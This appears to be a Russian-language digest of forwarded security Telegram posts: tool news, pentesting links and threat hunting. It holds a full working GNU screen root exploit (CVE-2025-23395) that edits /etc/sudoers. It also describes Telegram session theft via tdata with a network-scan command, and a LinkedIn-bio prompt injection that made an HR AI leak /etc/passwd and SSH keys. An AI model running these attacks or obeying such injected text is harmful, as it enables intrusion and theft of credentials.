www.opennet.ru
Проект Tor представил Oniux, утилиту для сетевой изоляции приложений
Разработчики проекта Tor представили утилиту Oniux, предназначенную для принудительного направления трафика отдельных приложений через сеть Tor. По своему назначению Oniux напоминает ранее доступную программу torsocks и отличается использованием для изоляции…
🔗Ссылка:
https://opennet.ru/63237/
https://opennet.ru/63237/
Forwarded from AP Security
#soc
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
GitHub
GitHub - FalconForceTeam/FalconHound: FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of…
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log ag...
👍1
Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...
#redteam #pentest #ad #adcs
#redteam #pentest #ad #adcs
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from Adaptix Framework
Forwarded from Похек
Kubernetes Pentesting
MicroK8s Pentesting
Docker Engine API Pentesting
Docker Escape
Docker Pentesting
Docker Registry Pentesting
Moby Docker Engine PrivEsc
Простой скрипт для проверки базовых векторов побега из Docker
https://github.com/eversinc33/JailWhale
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from s0ld13r ch. (s0ld13r)
Just make some Telegram enumeration ❤️
Наверняка многие уже слышали про папку tdata, которую Telegram Desktop создает локально на устройстве пользователя. Но далеко не все понимают, какую ценность она представляет для атакующего❗️
Если вы получаете доступ к tdata, вы фактически получаете незаметный доступ к Telegram-аккаунту пользователя. Такая сессия не отображается в списке активных сессий Telegram, и владелец аккаунта даже не узнает о компрометации. Для ред тимеров это отличный вектор для реализации техники T1552.008 Unsecured Credentials: Chat Messages😏
Для автоматизации энумерации устройств с Telegram Desktop я написал легковесный модуль для NetExec (форк CrackMapExec). Модуль сканирует Windows-шары по сети и ищет следы установленного Telegram✈️
5️⃣ GitHub repo: https://github.com/s0ld13rr/nxc_modules
👩💻 Usage:
P.S Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и только в согласованных Red Team проектах🚨
🧢 s0ld13r
Наверняка многие уже слышали про папку tdata, которую Telegram Desktop создает локально на устройстве пользователя. Но далеко не все понимают, какую ценность она представляет для атакующего
Если вы получаете доступ к tdata, вы фактически получаете незаметный доступ к Telegram-аккаунту пользователя. Такая сессия не отображается в списке активных сессий Telegram, и владелец аккаунта даже не узнает о компрометации. Для ред тимеров это отличный вектор для реализации техники T1552.008 Unsecured Credentials: Chat Messages
Для автоматизации энумерации устройств с Telegram Desktop я написал легковесный модуль для NetExec (форк CrackMapExec). Модуль сканирует Windows-шары по сети и ищет следы установленного Telegram
nxc smb 10.0.0.0/8 -u 'user' -p 'password' -M telegram
P.S Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и только в согласованных Red Team проектах
Please open Telegram to view this post
VIEW IN TELEGRAM
😎1
Forwarded from Threat Hunting Father 🦔
Modern Threat Hunting.pdf
6.4 MB
Modern Threat Hunting: 10 Practical Steps to Outsmart Adversaries
Content📖
- Identify malicious infrastructure at scale
- Pivot across IOCs, TLS certs, and SSH keys
- Track phishing kits, malware servers, and C2 infrastructure
- Build repeatable, hypothesis-driven hunt workflows
- Use HuntSQL™ to speed up investigations
🔗 https://hunt.io/learning/modern-threat-hunting
🦔 THF
Content📖
- Identify malicious infrastructure at scale
- Pivot across IOCs, TLS certs, and SSH keys
- Track phishing kits, malware servers, and C2 infrastructure
- Build repeatable, hypothesis-driven hunt workflows
- Use HuntSQL™ to speed up investigations
🔗 https://hunt.io/learning/modern-threat-hunting
🦔 THF
Forwarded from Поросёнок Пётр
Кажется я рассказывал тут как мой скилл в Linkedin в виде blind xss срабатывал в разных местах и системах.
Пришла эпоха prompt injection в Linkedin Bio 😁.
Уже работает! 🤣
На фото реальная история как HR вернул содержимое etc/passwd, IP и ~/.ssh
PS: Теперь точно без работы не останемся 😁
Пришла эпоха prompt injection в Linkedin Bio 😁.
Уже работает! 🤣
На фото реальная история как HR вернул содержимое etc/passwd, IP и ~/.ssh
PS: Теперь точно без работы не останемся 😁
🔥2